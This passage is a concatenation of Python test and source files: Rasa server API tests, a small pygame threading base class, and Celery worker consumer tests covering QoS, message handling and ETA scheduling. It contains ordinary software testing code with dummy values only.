"https://example.com/model/trained_core_model",
content_type="application/x-tar",
headers={
"filename": "some_model_name.tar.gz",
"ETag": "new_fingerprint",
},
body=f.read(),
)
data = {"model_server": {"url": endpoint.url}}
_, response = await rasa_app.put("/model", json=data)
assert response.status == HTTPStatus.NO_CONTENT
_, response = await rasa_app.get("/status")
assert response.status == HTTPStatus.OK
assert "fingerprint" in response.json
assert old_fingerprint != response.json["fingerprint"]
async def test_load_model_invalid_request_body(
rasa_non_trained_app: SanicASGITestClient,
):
_, response = await rasa_non_trained_app.put("/model")
assert response.status == HTTPStatus.BAD_REQUEST
async def test_load_model_invalid_configuration(
rasa_non_trained_app: SanicASGITestClient,
):
data = {"model_file": "some-random-path"}
_, response = await rasa_non_trained_app.put("/model", json=data)
assert response.status == HTTPStatus.BAD_REQUEST
async def test_execute(rasa_app: SanicASGITestClient):
await _create_tracker_for_sender(rasa_app, "test_execute")
data = {INTENT_NAME_KEY: "utter_greet"}
_, response = await rasa_app.post("/conversations/test_execute/execute", json=data)
assert response.status == HTTPStatus.OK
parsed_content = response.json
assert parsed_content["tracker"]
assert parsed_content["messages"]
async def test_execute_without_conversation_id(rasa_app: SanicASGITestClient):
data = {INTENT_NAME_KEY: "utter_greet"}
_, response = await rasa_app.post(
"/conversations/non_existent_id/execute", json=data
)
assert response.status == HTTPStatus.NOT_FOUND
assert response.json["message"] == "Conversation ID not found."
async def test_execute_with_missing_action_name(rasa_app: SanicASGITestClient):
test_sender = "test_execute_with_missing_action_name"
await _create_tracker_for_sender(rasa_app, test_sender)
data = {"wrong-key": "utter_greet"}
_, response = await rasa_app.post(
f"/conversations/{test_sender}/execute", json=data
)
assert response.status == HTTPStatus.BAD_REQUEST
async def test_execute_with_not_existing_action(rasa_app: SanicASGITestClient):
test_sender = "test_execute_with_not_existing_action"
await _create_tracker_for_sender(rasa_app, test_sender)
data = {"name": "ka[pa[opi[opj[oj[oija"}
_, response = await rasa_app.post(
f"/conversations/{test_sender}/execute", json=data
)
assert response.status == HTTPStatus.INTERNAL_SERVER_ERROR
async def test_trigger_intent(rasa_app: SanicASGITestClient):
data = {INTENT_NAME_KEY: "greet"}
_, response = await rasa_app.post(
"/conversations/test_trigger/trigger_intent", json=data
)
assert response.status == HTTPStatus.OK
parsed_content = response.json
assert parsed_content["tracker"]
assert parsed_content["messages"]
async def test_trigger_intent_with_entity(rasa_app: SanicASGITestClient):
entity_name = "name"
entity_value = "Sara"
data = {INTENT_NAME_KEY: "greet", "entities": {entity_name: entity_value}}
_, response = await rasa_app.post(
"/conversations/test_trigger/trigger_intent", json=data
)
assert response.status == HTTPStatus.OK
parsed_content = response.json
last_slot_set_event = [
event
for event in parsed_content["tracker"]["events"]
if event["event"] == "slot"
][-1]
assert parsed_content["tracker"]
assert parsed_content["messages"]
assert last_slot_set_event["name"] == entity_name
assert last_slot_set_event["value"] == entity_value
async def test_trigger_intent_with_missing_intent_name(rasa_app: SanicASGITestClient):
test_sender = "test_trigger_intent_with_missing_action_name"
data = {"wrong-key": "greet"}
_, response = await rasa_app.post(
f"/conversations/{test_sender}/trigger_intent", json=data
)
assert response.status == HTTPStatus.BAD_REQUEST
async def test_trigger_intent_with_not_existing_intent(rasa_app: SanicASGITestClient):
test_sender = "test_trigger_intent_with_not_existing_intent"
await _create_tracker_for_sender(rasa_app, test_sender)
data = {INTENT_NAME_KEY: "ka[pa[opi[opj[oj[oija"}
_, response = await rasa_app.post(
f"/conversations/{test_sender}/trigger_intent", json=data
)
assert response.status == HTTPStatus.NOT_FOUND
@pytest.mark.parametrize(
"input_channels, output_channel_to_use, expected_channel",
[
(None, "slack", CollectingOutputChannel),
([], None, CollectingOutputChannel),
([RestInput()], "slack", CollectingOutputChannel),
([RestInput()], "rest", CollectingOutputChannel),
(
[RestInput(), SlackInput("test", slack_signing_secret="foobar")],
"slack",
SlackBot,
),
],
)
def test_get_output_channel(
input_channels: List[Text], output_channel_to_use: Text, expected_channel: Type
):
request = MagicMock()
app = MagicMock()
app.input_channels = input_channels
request.app = app
request.args = {"output_channel": output_channel_to_use}
actual = rasa.server._get_output_channel(request, None)
assert isinstance(actual, expected_channel)
@pytest.mark.parametrize(
"input_channels, expected_channel",
[
([], CollectingOutputChannel),
([RestInput()], CollectingOutputChannel),
([RestInput(), SlackInput("test", slack_signing_secret="foobar")], SlackBot),
],
)
def test_get_latest_output_channel(input_channels: List[Text], expected_channel: Type):
request = MagicMock()
app = MagicMock()
app.input_channels = input_channels
request.app = app
request.args = {"output_channel": "latest"}
tracker = DialogueStateTracker.from_events(
"default", [UserUttered("text", input_channel="slack")]
)
actual = rasa.server._get_output_channel(request, tracker)
assert isinstance(actual, expected_channel)
def test_app_when_app_has_no_input_channels():
request = MagicMock()
class NoInputChannels:
pass
request.app = NoInputChannels()
actual = rasa.server._get_output_channel(
request, DialogueStateTracker.from_events("default", [])
)
assert isinstance(actual, CollectingOutputChannel)
@pytest.mark.parametrize(
"conversation_events,until_time,fetch_all_sessions,expected",
# conversation with one session
[
(
[
ActionExecuted(ACTION_SESSION_START_NAME),
SessionStarted(),
UserUttered("hi", {"name": "greet"}),
ActionExecuted("utter_greet"),
],
None,
True,
"""version: "2.0"
stories:
- story: some-conversation-ID
steps:
- intent: greet
user: |-
hi
- action: utter_greet""",
),
# conversation with multiple sessions
(
[
ActionExecuted(ACTION_SESSION_START_NAME),
SessionStarted(),
UserUttered("hi", {"name": "greet"}),
ActionExecuted("utter_greet"),
ActionExecuted(ACTION_SESSION_START_NAME),
SessionStarted(),
UserUttered("bye bye", {"name": "goodbye"}),
ActionExecuted("utter_goodbye"),
],
None,
True,
"""version: "2.0"
stories:
- story: some-conversation-ID, story 1
steps:
- intent: greet
user: |-
hi
- action: utter_greet
- story: some-conversation-ID, story 2
steps:
- intent: goodbye
user: |-
bye bye
- action: utter_goodbye""",
),
# conversation with multiple sessions, but setting `all_sessions=false`
# means only the last one is returned
(
[
ActionExecuted(ACTION_SESSION_START_NAME),
SessionStarted(),
UserUttered("hi", {"name": "greet"}),
ActionExecuted("utter_greet"),
ActionExecuted(ACTION_SESSION_START_NAME),
SessionStarted(),
UserUttered("bye bye", {"name": "goodbye"}),
ActionExecuted("utter_goodbye"),
],
None,
False,
"""version: "2.0"
stories:
- story: some-conversation-ID
steps:
- intent: goodbye
user: |-
bye bye
- action: utter_goodbye""",
),
# the default for `all_sessions` is `false` - this test checks that
# only the latest session is returned in that case
(
[
ActionExecuted(ACTION_SESSION_START_NAME),
SessionStarted(),
UserUttered("hi", {"name": "greet"}),
ActionExecuted("utter_greet"),
ActionExecuted(ACTION_SESSION_START_NAME),
SessionStarted(),
UserUttered("bye bye", {"name": "goodbye"}),
ActionExecuted("utter_goodbye"),
],
None,
None,
"""version: "2.0"
stories:
- story: some-conversation-ID
steps:
- intent: goodbye
user: |-
bye bye
- action: utter_goodbye""",
),
# `until` parameter means only the first session is returned
(
[
ActionExecuted(ACTION_SESSION_START_NAME, timestamp=1),
SessionStarted(timestamp=2),
UserUttered("hi", {"name": "greet"}, timestamp=3),
ActionExecuted("utter_greet", timestamp=4),
ActionExecuted(ACTION_SESSION_START_NAME, timestamp=5),
SessionStarted(timestamp=6),
UserUttered("bye bye", {"name": "goodbye"}, timestamp=7),
ActionExecuted("utter_goodbye", timestamp=8),
],
4,
True,
"""version: "2.0"
stories:
- story: some-conversation-ID
steps:
- intent: greet
user: |-
hi
- action: utter_greet""",
),
# empty conversation
([], None, True, 'version: "2.0"'),
# Conversation with slot
(
[
ActionExecuted(ACTION_SESSION_START_NAME),
SessionStarted(),
UserUttered("hi", {"name": "greet"}),
ActionExecuted("utter_greet"),
SlotSet(REQUESTED_SLOT, "some value"),
],
None,
True,
"""version: "2.0"
stories:
- story: some-conversation-ID
steps:
- intent: greet
user: |-
hi
- action: utter_greet
- slot_was_set:
- requested_slot: some value""",
),
],
)
async def test_get_story(
rasa_app: SanicASGITestClient,
monkeypatch: MonkeyPatch,
conversation_events: List[Event],
until_time: Optional[float],
fetch_all_sessions: Optional[bool],
expected: Text,
):
conversation_id = "some-conversation-ID"
tracker_store = InMemoryTrackerStore(Domain.empty())
tracker = DialogueStateTracker.from_events(conversation_id, conversation_events)
tracker_store.save(tracker)
monkeypatch.setattr(rasa_app.sanic_app.agent, "tracker_store", tracker_store)
monkeypatch.setattr(
rasa_app.sanic_app.agent.processor, "tracker_store", tracker_store
)
url = f"/conversations/{conversation_id}/story?"
query = {}
if fetch_all_sessions is not None:
query["all_sessions"] = fetch_all_sessions
if until_time is not None:
query["until"] = until_time
_, response = await rasa_app.get(url + urllib.parse.urlencode(query))
assert response.status == HTTPStatus.OK
assert response.content.decode().strip() == expected
async def test_get_story_without_conversation_id(
rasa_app: SanicASGITestClient, monkeypatch: MonkeyPatch
):
conversation_id = "some-conversation-ID"
url = f"/conversations/{conversation_id}/story"
_, response = await rasa_app.get(url)
assert response.status == HTTPStatus.NOT_FOUND
assert response.json["message"] == "Conversation ID not found."
async def test_get_story_does_not_update_conversation_session(
rasa_app: SanicASGITestClient, monkeypatch: MonkeyPatch
):
conversation_id = "some-conversation-ID"
# domain with short session expiration time of one second
domain = Domain.empty()
domain.session_config = SessionConfig(
session_expiration_time=1 / 60, carry_over_slots=True
)
monkeypatch.setattr(rasa_app.sanic_app.agent.processor, "domain", domain)
# conversation contains one session that has expired
now = time.time()
conversation_events = [
ActionExecuted(ACTION_SESSION_START_NAME, timestamp=now - 10),
SessionStarted(timestamp=now - 9),
UserUttered("hi", {"name": "greet"}, timestamp=now - 8),
ActionExecuted("utter_greet", timestamp=now - 7),
]
tracker = DialogueStateTracker.from_events(conversation_id, conversation_events)
# the conversation session has expired
assert rasa_app.sanic_app.agent.processor._has_session_expired(tracker)
tracker_store = InMemoryTrackerStore(domain)
tracker_store.save(tracker)
monkeypatch.setattr(rasa_app.sanic_app.agent, "tracker_store", tracker_store)
monkeypatch.setattr(
rasa_app.sanic_app.agent.processor, "tracker_store", tracker_store
)
_, response = await rasa_app.get(f"/conversations/{conversation_id}/story")
assert response.status == HTTPStatus.OK
# expected story is returned
assert (
response.content.decode().strip()
== """version: "2.0"
stories:
- story: some-conversation-ID
steps:
- intent: greet
user: |-
hi
- action: utter_greet"""
)
# the tracker has the same number of events as were initially added
assert len(tracker.events) == len(conversation_events)
# the last event is still the same as before
assert tracker.events[-1].timestamp == conversation_events[-1].timestamp
@pytest.mark.parametrize(
"initial_tracker_events,events_to_append,expected_events",
[
(
# the tracker is initially empty, and no events are appended
# so we'll just expect the session start sequence with an `action_listen`
[],
[],
[
ActionExecuted(ACTION_SESSION_START_NAME),
SessionStarted(),
ActionExecuted(ACTION_LISTEN_NAME),
],
),
(
# the tracker is initially empty, and a user utterance is appended
# we expect a tracker with a session start sequence and a user utterance
[],
[UserUttered("/greet", {"name": "greet", "confidence": 1.0})],
[
ActionExecuted(ACTION_SESSION_START_NAME),
SessionStarted(),
ActionExecuted(ACTION_LISTEN_NAME),
UserUttered("/greet", {"name": "greet", "confidence": 1.0}),
],
),
(
# the tracker is initially empty, and a session start sequence is appended
# we'll just expect the session start sequence
[],
[ActionExecuted(ACTION_SESSION_START_NAME), SessionStarted()],
[ActionExecuted(ACTION_SESSION_START_NAME), SessionStarted()],
),
(
# the tracker already contains some events - we can simply append events
[
ActionExecuted(ACTION_LISTEN_NAME),
UserUttered("/greet", {"name": "greet", "confidence": 1.0}),
],
[ActionExecuted("utter_greet")],
[
ActionExecuted(ACTION_LISTEN_NAME),
UserUttered("/greet", {"name": "greet", "confidence": 1.0}),
ActionExecuted("utter_greet"),
],
),
],
)
async def test_update_conversation_with_events(
rasa_app: SanicASGITestClient,
monkeypatch: MonkeyPatch,
initial_tracker_events: List[Event],
events_to_append: List[Event],
expected_events: List[Event],
):
conversation_id = "some-conversation-ID"
agent = rasa_app.sanic_app.agent
tracker_store = agent.tracker_store
domain = agent.domain
model_id = agent.model_id
if initial_tracker_events:
tracker = agent.processor.get_tracker(conversation_id)
tracker.update_with_events(initial_tracker_events, domain)
tracker_store.save(tracker)
fetched_tracker = await rasa.server.update_conversation_with_events(
conversation_id, agent.processor, domain, events_to_append
)
assert list(fetched_tracker.events) == with_model_ids(expected_events, model_id)
|
unnamed.py
|
"""
this class is the base class
for all things like enemies, and characters.
"""
import pygame as pg
import threading
class IDontKnowWhatToCallItYet:
def start_thread(self, **kwargs):
self.mainthread = threading.Thread(
target=self.mainloop, daemon=True, **kwargs)
self.mainthread.start()
    def mainloop(self):
        pass
        # This still needs to be figured out; I figure I can do that
        # once more of the workings are in place.
    def kill_thread(self):
        # Minimal sketch: clear a cooperative `running` flag (an assumed
        # attribute; a subclass's mainloop() must check it) and wait for
        # the worker thread to finish.
        self.running = False
        self.mainthread.join()
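# Usage sketch (added for illustration; ExampleSprite and the update rate
# are assumptions, not part of the original file): a subclass overrides
# mainloop() with a loop that honours the `running` flag cleared by
# kill_thread() above.
import time
class ExampleSprite(IDontKnowWhatToCallItYet):
    def mainloop(self):
        self.running = True
        while self.running:
            time.sleep(1 / 60)  # tick the entity's logic ~60 times per second
# enemy = ExampleSprite()
# enemy.start_thread()   # runs mainloop() on a daemon thread
# enemy.kill_thread()    # clears the flag and joins the thread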
|
__init__.py
|
from __future__ import absolute_import
from __future__ import with_statement
import socket
import sys
from collections import deque
from datetime import datetime, timedelta
from Queue import Empty
from kombu.transport.base import Message
from kombu.connection import BrokerConnection
from mock import Mock, patch
from nose import SkipTest
from celery import current_app
from celery.app.defaults import DEFAULTS
from celery.concurrency.base import BasePool
from celery.datastructures import AttributeDict
from celery.exceptions import SystemTerminate
from celery.task import task as task_dec
from celery.task import periodic_task as periodic_task_dec
from celery.utils import uuid
from celery.worker import WorkController
from celery.worker.buckets import FastQueue
from celery.worker.job import Request
from celery.worker.consumer import Consumer as MainConsumer
from celery.worker.consumer import QoS, RUN, PREFETCH_COUNT_MAX, CLOSE
from celery.utils.serialization import pickle
from celery.utils.timer2 import Timer
from celery.tests.utils import AppCase, Case
class PlaceHolder(object):
pass
class MyKombuConsumer(MainConsumer):
broadcast_consumer = Mock()
task_consumer = Mock()
def __init__(self, *args, **kwargs):
kwargs.setdefault("pool", BasePool(2))
super(MyKombuConsumer, self).__init__(*args, **kwargs)
def restart_heartbeat(self):
self.heart = None
class MockNode(object):
commands = []
def handle_message(self, body, message):
self.commands.append(body.pop("command", None))
class MockEventDispatcher(object):
sent = []
closed = False
flushed = False
_outbound_buffer = []
def send(self, event, *args, **kwargs):
self.sent.append(event)
def close(self):
self.closed = True
def flush(self):
self.flushed = True
class MockHeart(object):
closed = False
def stop(self):
self.closed = True
@task_dec()
def foo_task(x, y, z, **kwargs):
return x * y * z
@periodic_task_dec(run_every=60)
def foo_periodic_task():
return "foo"
def create_message(channel, **data):
data.setdefault("id", uuid())
channel.no_ack_consumers = set()
return Message(channel, body=pickle.dumps(dict(**data)),
content_type="application/x-python-serialize",
content_encoding="binary",
delivery_info={"consumer_tag": "mock"})
class test_QoS(Case):
class _QoS(QoS):
def __init__(self, value):
self.value = value
QoS.__init__(self, None, value, None)
def set(self, value):
return value
def test_qos_increment_decrement(self):
qos = self._QoS(10)
self.assertEqual(qos.increment(), 11)
self.assertEqual(qos.increment(3), 14)
self.assertEqual(qos.increment(-30), 14)
self.assertEqual(qos.decrement(7), 7)
self.assertEqual(qos.decrement(), 6)
with self.assertRaises(AssertionError):
qos.decrement(10)
def test_qos_disabled_increment_decrement(self):
qos = self._QoS(0)
self.assertEqual(qos.increment(), 0)
self.assertEqual(qos.increment(3), 0)
self.assertEqual(qos.increment(-30), 0)
self.assertEqual(qos.decrement(7), 0)
self.assertEqual(qos.decrement(), 0)
self.assertEqual(qos.decrement(10), 0)
def test_qos_thread_safe(self):
qos = self._QoS(10)
def add():
for i in xrange(1000):
qos.increment()
def sub():
for i in xrange(1000):
qos.decrement_eventually()
def threaded(funs):
from threading import Thread
threads = [Thread(target=fun) for fun in funs]
for thread in threads:
thread.start()
for thread in threads:
thread.join()
threaded([add, add])
self.assertEqual(qos.value, 2010)
qos.value = 1000
threaded([add, sub]) # n = 2
self.assertEqual(qos.value, 1000)
def test_exceeds_short(self):
qos = QoS(Mock(), PREFETCH_COUNT_MAX - 1,
current_app.log.get_default_logger())
qos.update()
self.assertEqual(qos.value, PREFETCH_COUNT_MAX - 1)
qos.increment()
self.assertEqual(qos.value, PREFETCH_COUNT_MAX)
qos.increment()
self.assertEqual(qos.value, PREFETCH_COUNT_MAX + 1)
qos.decrement()
self.assertEqual(qos.value, PREFETCH_COUNT_MAX)
qos.decrement()
self.assertEqual(qos.value, PREFETCH_COUNT_MAX - 1)
def test_consumer_increment_decrement(self):
consumer = Mock()
qos = QoS(consumer, 10, current_app.log.get_default_logger())
qos.update()
self.assertEqual(qos.value, 10)
self.assertIn({"prefetch_count": 10}, consumer.qos.call_args)
qos.decrement()
self.assertEqual(qos.value, 9)
self.assertIn({"prefetch_count": 9}, consumer.qos.call_args)
qos.decrement_eventually()
self.assertEqual(qos.value, 8)
self.assertIn({"prefetch_count": 9}, consumer.qos.call_args)
# Does not decrement 0 value
qos.value = 0
qos.decrement()
self.assertEqual(qos.value, 0)
qos.increment()
self.assertEqual(qos.value, 0)
def test_consumer_decrement_eventually(self):
consumer = Mock()
qos = QoS(consumer, 10, current_app.log.get_default_logger())
qos.decrement_eventually()
self.assertEqual(qos.value, 9)
qos.value = 0
qos.decrement_eventually()
self.assertEqual(qos.value, 0)
def test_set(self):
consumer = Mock()
qos = QoS(consumer, 10, current_app.log.get_default_logger())
qos.set(12)
self.assertEqual(qos.prev, 12)
qos.set(qos.prev)
class test_Consumer(Case):
def setUp(self):
self.ready_queue = FastQueue()
self.eta_schedule = Timer()
self.logger = current_app.log.get_default_logger()
self.logger.setLevel(0)
def tearDown(self):
self.eta_schedule.stop()
def test_info(self):
l = MyKombuConsumer(self.ready_queue, self.eta_schedule, self.logger,
send_events=False)
l.qos = QoS(l.task_consumer, 10, l.logger)
info = l.info
self.assertEqual(info["prefetch_count"], 10)
self.assertFalse(info["broker"])
l.connection = current_app.broker_connection()
info = l.info
self.assertTrue(info["broker"])
def test_start_when_closed(self):
l = MyKombuConsumer(self.ready_queue, self.eta_schedule, self.logger,
send_events=False)
l._state = CLOSE
l.start()
def test_connection(self):
l = MyKombuConsumer(self.ready_queue, self.eta_schedule, self.logger,
send_events=False)
l.reset_connection()
self.assertIsInstance(l.connection, BrokerConnection)
l._state = RUN
l.event_dispatcher = None
l.stop_consumers(close_connection=False)
self.assertTrue(l.connection)
l._state = RUN
l.stop_consumers()
self.assertIsNone(l.connection)
self.assertIsNone(l.task_consumer)
l.reset_connection()
self.assertIsInstance(l.connection, BrokerConnection)
l.stop_consumers()
l.stop()
l.close_connection()
self.assertIsNone(l.connection)
self.assertIsNone(l.task_consumer)
def test_close_connection(self):
l = MyKombuConsumer(self.ready_queue, self.eta_schedule, self.logger,
send_events=False)
l._state = RUN
l.close_connection()
l = MyKombuConsumer(self.ready_queue, self.eta_schedule, self.logger,
send_events=False)
eventer = l.event_dispatcher = Mock()
eventer.enabled = True
heart = l.heart = MockHeart()
l._state = RUN
l.stop_consumers()
self.assertTrue(eventer.close.call_count)
self.assertTrue(heart.closed)
def test_receive_message_unknown(self):
l = MyKombuConsumer(self.ready_queue, self.eta_schedule, self.logger,
send_events=False)
backend = Mock()
m = create_message(backend, unknown={"baz": "!!!"})
l.event_dispatcher = Mock()
l.pidbox_node = MockNode()
with self.assertWarnsRegex(RuntimeWarning, r'unknown message'):
l.receive_message(m.decode(), m)
@patch("celery.utils.timer2.to_timestamp")
def test_receive_message_eta_OverflowError(self, to_timestamp):
to_timestamp.side_effect = OverflowError()
l = MyKombuConsumer(self.ready_queue, self.eta_schedule, self.logger,
send_events=False)
m = create_message(Mock(), task=foo_task.name,
args=("2, 2"),
kwargs={},
eta=datetime.now().isoformat())
l.event_dispatcher = Mock()
l.pidbox_node = MockNode()
l.update_strategies()
l.receive_message(m.decode(), m)
self.assertTrue(m.acknowledged)
self.assertTrue(to_timestamp.call_count)
def test_receive_message_InvalidTaskError(self):
logger = Mock()
l = MyKombuConsumer(self.ready_queue, self.eta_schedule, logger,
send_events=False)
m = create_message(Mock(), task=foo_task.name,
args=(1, 2), kwargs="foobarbaz", id=1)
l.update_strategies()
l.event_dispatcher = Mock()
l.pidbox_node = MockNode()
l.receive_message(m.decode(), m)
self.assertIn("Received invalid task message",
logger.error.call_args[0][0])
def test_on_decode_error(self):
logger = Mock()
l = MyKombuConsumer(self.ready_queue, self.eta_schedule, logger,
send_events=False)
class MockMessage(Mock):
content_type = "application/x-msgpack"
content_encoding = "binary"
body = "foobarbaz"
message = MockMessage()
l.on_decode_error(message, KeyError("foo"))
self.assertTrue(message.ack.call_count)
self.assertIn("Can't decode message body",
logger.critical.call_args[0][0])
    def test_receive_message(self):
l = MyKombuConsumer(self.ready_queue, self.eta_schedule, self.logger,
send_events=False)
m = create_message(Mock(), task=foo_task.name,
args=[2, 4, 8], kwargs={})
l.update_strategies()
l.event_dispatcher = Mock()
l.receive_message(m.decode(), m)
in_bucket = self.ready_queue.get_nowait()
self.assertIsInstance(in_bucket, Request)
self.assertEqual(in_bucket.task_name, foo_task.name)
self.assertEqual(in_bucket.execute(), 2 * 4 * 8)
self.assertTrue(self.eta_schedule.empty())
def test_start_connection_error(self):
class MockConsumer(MainConsumer):
iterations = 0
def consume_messages(self):
if not self.iterations:
self.iterations = 1
raise KeyError("foo")
raise SyntaxError("bar")
l = MockConsumer(self.ready_queue, self.eta_schedule, self.logger,
send_events=False, pool=BasePool())
l.connection_errors = (KeyError, )
with self.assertRaises(SyntaxError):
l.start()
l.heart.stop()
l.priority_timer.stop()
def test_start_channel_error(self):
# Regression test for AMQPChannelExceptions that can occur within the
# consumer. (i.e. 404 errors)
class MockConsumer(MainConsumer):
iterations = 0
def consume_messages(self):
if not self.iterations:
self.iterations = 1
raise KeyError("foo")
raise SyntaxError("bar")
l = MockConsumer(self.ready_queue, self.eta_schedule, self.logger,
send_events=False, pool=BasePool())
l.channel_errors = (KeyError, )
self.assertRaises(SyntaxError, l.start)
l.heart.stop()
l.priority_timer.stop()
def test_consume_messages_ignores_socket_timeout(self):
class Connection(current_app.broker_connection().__class__):
obj = None
def drain_events(self, **kwargs):
self.obj.connection = None
raise socket.timeout(10)
l = MyKombuConsumer(self.ready_queue, self.eta_schedule, self.logger,
send_events=False)
l.connection = Connection()
l.task_consumer = Mock()
l.connection.obj = l
l.qos = QoS(l.task_consumer, 10, l.logger)
l.consume_messages()
def test_consume_messages_when_socket_error(self):
class Connection(current_app.broker_connection().__class__):
obj = None
def drain_events(self, **kwargs):
self.obj.connection = None
raise socket.error("foo")
l = MyKombuConsumer(self.ready_queue, self.eta_schedule, self.logger,
send_events=False)
l._state = RUN
c = l.connection = Connection()
l.connection.obj = l
l.task_consumer = Mock()
l.qos = QoS(l.task_consumer, 10, l.logger)
with self.assertRaises(socket.error):
l.consume_messages()
l._state = CLOSE
l.connection = c
l.consume_messages()
def test_consume_messages(self):
class Connection(current_app.broker_connection().__class__):
obj = None
def drain_events(self, **kwargs):
self.obj.connection = None
l = MyKombuConsumer(self.ready_queue, self.eta_schedule, self.logger,
send_events=False)
l.connection = Connection()
l.connection.obj = l
l.task_consumer = Mock()
l.qos = QoS(l.task_consumer, 10, l.logger)
l.consume_messages()
l.consume_messages()
self.assertTrue(l.task_consumer.consume.call_count)
l.task_consumer.qos.assert_called_with(prefetch_count=10)
l.qos.decrement()
l.consume_messages()
l.task_consumer.qos.assert_called_with(prefetch_count=9)
def test_maybe_conn_error(self):
l = MyKombuConsumer(self.ready_queue, self.eta_schedule, self.logger,
send_events=False)
l.connection_errors = (KeyError, )
l.channel_errors = (SyntaxError, )
l.maybe_conn_error(Mock(side_effect=AttributeError("foo")))
l.maybe_conn_error(Mock(side_effect=KeyError("foo")))
l.maybe_conn_error(Mock(side_effect=SyntaxError("foo")))
with self.assertRaises(IndexError):
l.maybe_conn_error(Mock(side_effect=IndexError("foo")))
def test_apply_eta_task(self):
from celery.worker import state
l = MyKombuConsumer(self.ready_queue, self.eta_schedule, self.logger,
send_events=False)
l.qos = QoS(None, 10, l.logger)
task = object()
qos = l.qos.value
l.apply_eta_task(task)
self.assertIn(task, state.reserved_requests)
self.assertEqual(l.qos.value, qos - 1)
self.assertIs(self.ready_queue.get_nowait(), task)
    def test_receive_message_eta_isoformat(self):
l = MyKombuConsumer(self.ready_queue, self.eta_schedule, self.logger,
send_events=False)
m = create_message(Mock(), task=foo_task.name,
eta=datetime.now().isoformat(),
args=[2, 4, 8], kwargs={})
l.task_consumer = Mock()
l.qos = QoS(l.task_consumer, l.initial_prefetch_count, l.logger)
l.event_dispatcher = Mock()
l.enabled = False
l.update_strategies()
l.receive_message(m.decode(), m)
l.eta_schedule.stop()
items = [entry[2] for entry in self.eta_schedule.queue]
        found = False
for item in items:
if item.args[0].name == foo_task.name:
found = True
self.assertTrue(found)
self.assertTrue(l.task_consumer.qos.call_count)
l.eta_schedule.stop()
def test_on_control(self):
l = MyKombuConsumer(self.ready_queue, self.eta_schedule, self.logger,
send_events=False)
l.pidbox_node = Mock()
l.reset_pidbox_node = Mock()
l.on_control("foo", "bar")
l.pidbox_node.handle_message.assert_called_with("foo", "bar")
l.pidbox_node = Mock()
l.pidbox_node.handle_message.side_effect = KeyError("foo")
l.on_control("foo", "bar")
l.pidbox_node.handle_message.assert_called_with("foo", "bar")
l.pidbox_node = Mock()
l.pidbox_node.handle_message.side_effect = ValueError("foo")
l.on_control("foo", "bar")
l.pidbox_node.handle_message.assert_called_with("foo", "bar")
l.reset_pidbox_node.assert_called_with()
def test_revoke(self):
ready_queue = FastQueue()
l = MyKombuConsumer(ready_queue, self.eta_schedule, self.logger,
send_events=False)
backend = Mock()
id = uuid()
t = create_message(backend, task=foo_task.name, args=[2, 4, 8],
kwargs={}, id=id)
from celery.worker.state import revoked
revoked.add(id)
l.receive_message(t.decode(), t)
self.assertTrue(ready_queue.empty())
    def test_receive_message_not_registered(self):
l = MyKombuConsumer(self.ready_queue, self.eta_schedule, self.logger,
send_events=False)
backend = Mock()
m = create_message(backend, task="x.X.31x", args=[2, 4, 8], kwargs={})
l.event_dispatcher = Mock()
self.assertFalse(l.receive_message(m.decode(), m))
with self.assertRaises(Empty):
self.ready_queue.get_nowait()
self.assertTrue(self.eta_schedule.empty())
    def test_receive_message_ack_raises(self):
l = MyKombuConsumer(self.ready_queue, self.eta_schedule, self.logger,
send_events=False)
backend = Mock()
m = create_message(backend, args=[2, 4, 8], kwargs={})
l.event_dispatcher = Mock()
l.connection_errors = (socket.error, )
l.logger = Mock()
m.ack = Mock()
m.ack.side_effect = socket.error("foo")
with self.assertWarnsRegex(RuntimeWarning, r'unknown message'):
self.assertFalse(l.receive_message(m.decode(), m))
with self.assertRaises(Empty):
self.ready_queue.get_nowait()
self.assertTrue(self.eta_schedule.empty())
m.ack.assert_called_with()
self.assertTrue(l.logger.critical.call_count)
    def test_receive_message_eta(self):
l = MyKombuConsumer(self.ready_queue, self.eta_schedule, self.logger,
send_events=False)
l.event_dispatcher = Mock()
l.event_dispatcher._outbound_buffer = deque()
backend = Mock()
m = create_message(backend, task=foo_task.name,
args=[2, 4, 8], kwargs={},
eta=(datetime.now() +
timedelta(days=1)).isoformat())
l.reset_connection()
p = l.app.conf.BROKER_CONNECTION_RETRY
l.app.conf.BROKER_CONNECTION_RETRY = False
try:
l.reset_connection()
finally:
l.app.conf.BROKER_CONNECTION_RETRY = p
l.stop_consumers()
l.event_dispatcher = Mock()
l.receive_message(m.decode(), m)
l.eta_schedule.stop()
in_hold = self.eta_schedule.queue[0]
self.assertEqual(len(in_hold), 3)
eta, priority, entry = in_hold
task = entry.args[0]
self.assertIsInstance(task, Request)
self.assertEqual(task.task_name, foo_task.name)
self.assertEqual(task.execute(), 2 * 4 * 8)
with self.assertRaises(Empty):
self.ready_queue.get_nowait()
def test_reset_pidbox_node(self):
l = MyKombuConsumer(self.ready_queue, self.eta_schedule, self.logger,
send_events=False)
l.pidbox_node = Mock()
chan = l.pidbox_node.channel = Mock()
l.connection = Mock()
chan.close.side_effect = socket.error("foo")
l.connection_errors = (socket.error, )
l.reset_pidbox_node()
chan.close.assert_called_with()
def test_reset_pidbox_node_green(self):
l = MyKombuConsumer(self.ready_queue, self.eta_schedule, self.logger,
send_events=False)
l.pool = Mock()
l.pool.is_green = True
l.reset_pidbox_node()
l.pool.spawn_n.assert_called_with(l._green_pidbox_node)
def test__green_pidbox_node(self):
l = MyKombuConsumer(self.ready_queue, self.eta_schedule, self.logger,
send_events=False)
l.pidbox_node = Mock()
class BConsumer(Mock):
def __enter__(self):
self.consume()
return self
def __exit__(self, *exc_info):
self.cancel()
l.pidbox_node.listen = BConsumer()
connections = []
class Connection(object):
def __init__(self, obj):
connections.append(self)
self.obj = obj
self.default_channel = self.channel()
self.closed = False
def __enter__(self):
return self
def __exit__(self, *exc_info):
self.close()
def channel(self):
return Mock()
def drain_events(self, **kwargs):
self.obj.connection = None
self.obj._pidbox_node_shutdown.set()
def close(self):
self.closed = True
l.connection = Mock()
l._open_connection = lambda: Connection(obj=l)
l._green_pidbox_node()
l.pidbox_node.listen.assert_called_with(callback=l.on_control)
self.assertTrue(l.broadcast_consumer)
l.broadcast_consumer.consume.assert_called_with()
self.assertIsNone(l.connection)
self.assertTrue(connections[0].closed)
def test_start__consume_messages(self):
class _QoS(object):
prev = 3
value = 4
def update(self):
self.prev = self.value
class _Consumer(MyKombuConsumer):
iterations = 0
def reset_connection(self):
if self.iterations >= 1:
raise KeyError("foo")
init_callback = Mock()
l = _Consumer(self.ready_queue, self.eta_schedule, self.logger,
